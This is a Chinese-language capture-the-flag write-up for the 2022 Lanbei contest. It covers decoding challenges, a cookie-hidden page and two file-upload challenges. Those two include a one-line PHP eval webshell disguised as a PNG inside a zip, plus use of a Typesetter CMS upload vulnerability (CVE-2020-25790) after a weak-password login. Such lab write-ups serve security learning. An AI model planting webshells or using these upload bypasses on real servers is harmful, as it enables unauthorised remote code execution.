2022年蓝贝国际创新创业大赛“数字技术+信息安全领域赛道网络攻防大赛”wp

mine

img

注意观察这个符号,对应的是src.js中的res/face_normal.bmp

进行查找别的face,发现有face_success.bmp

img

首先进行hex解码

img

1
LJWXQ2C2GN2FKYKXGVXGGMTIGFGUQTJQMIZHQ3CJK42GQYKHKZ2VIQ2GN5MVGRTKJVKEEMSZLBFDS===

然后进行base32解码

img

1
ZmxhZ3tUaW5nc2h1MHM0b2xlIW4haGVuTCFoYSFjMTB2YXJ9

然后进行base64解码

img

flag{Tingshu0s4ole!n!henL!ha!c10var}

cook

查看cookie

img

然后访问7815696ecbf1c96e6894b779456d330e.php

img

flag{c7a4c2050907de3b70c519287f171f35}

upload-inc

查看源码,提示include.php

img

然后访问include.php,查看源码:提示upload.php和参数为file

img

似乎是原题第十一周 | 签到般的包含 | Danyhug’s Blog (gitee.io)

整一个1.php,写一句话木马

1
<?php @eval($_POST[1]);?>

进行压缩,将压缩文件后缀改为png

img

进行文件上传

img

然后蚁剑连接

image-20220715172645597

ezcms

找到登录界面

img

按照这个做一遍,弱密码登录

typesetter 文件上传(CVE-2020-25790)_xzhome的博客-CSDN博客

image-20220715201703774

然后上传木马1.zip,加压,然后蚁剑直接连接

img

找到flag.txt

img